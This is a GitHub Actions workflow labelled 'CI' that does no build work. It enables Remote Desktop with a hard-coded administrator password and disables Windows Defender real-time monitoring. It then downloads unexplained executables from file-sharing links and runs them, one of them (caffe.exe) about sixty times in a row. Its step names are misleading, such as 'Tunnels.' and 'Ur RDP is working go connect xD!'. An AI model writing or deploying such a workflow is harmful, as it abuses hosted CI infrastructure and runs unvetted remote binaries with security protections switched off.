name: CI

on: [push, workflow_dispatch]

jobs:

  build:
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract
      run: Expand-Archive ngrok.zip
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Ur RDP is working go connect xD!
      run: New-Item -Path "C:\21" -ItemType Directory
    - name: Ur RDP is working go connect xD!
      run: New-Item -Path "C:\2" -ItemType Directory
    - name: Download
      run: New-Item -Path "C:\1" -ItemType Directory
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/ruN42f_F/P135ZSWh.88dbe2c78e51fced9bfc7a0286296455 -outfile c:\21\RegMikroMan222.zip
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/2hQ7WJq-/5ZSyQCOf.9d7f06ebbfcd3efa5e6e0777b9d494e9 -outfile c:\21\cm413_64.zip
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/pUrbA9Xy/5ZSyQCOf.6b94c849e86a58640c2700935002215a -outfile c:\21\start.exe
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\RegMikroMan222.zip" -DestinationPath "C:\21"
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\cm413_64.zip" -DestinationPath "C:\21"
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "C:\21\start.exe"'
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell -ArgumentList '-Noexit -Command "C:\21\cm413_64\Clickermannv4.13x64\Clickermann.exe" "C:\21\cm413_64\Clickermannv4.13x64\2211.cms"'
    - name: Tunnels.
      run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Tunnels.
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: Download
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/ElPurZM2/5ZSyQCOf.e4038b1bfe969669eace0fb95ad28639 -outfile c:\21\1122.exe
    - name: Download
      run: Start-Process Powershell ' -Command "C:\21\RegMikroMan222\RemoteExecuteScriptSilent.exe"'
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "C:\21\RegMikroMan222\RegMikroMan2.2.2.exe"'
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "c:\21\1122.exe"'
    - name: Create Tunnel
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/7Zx9l_a1/5ZSyQCOf.764621b4340ef77e9169e0120aec8c52 -outfile c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
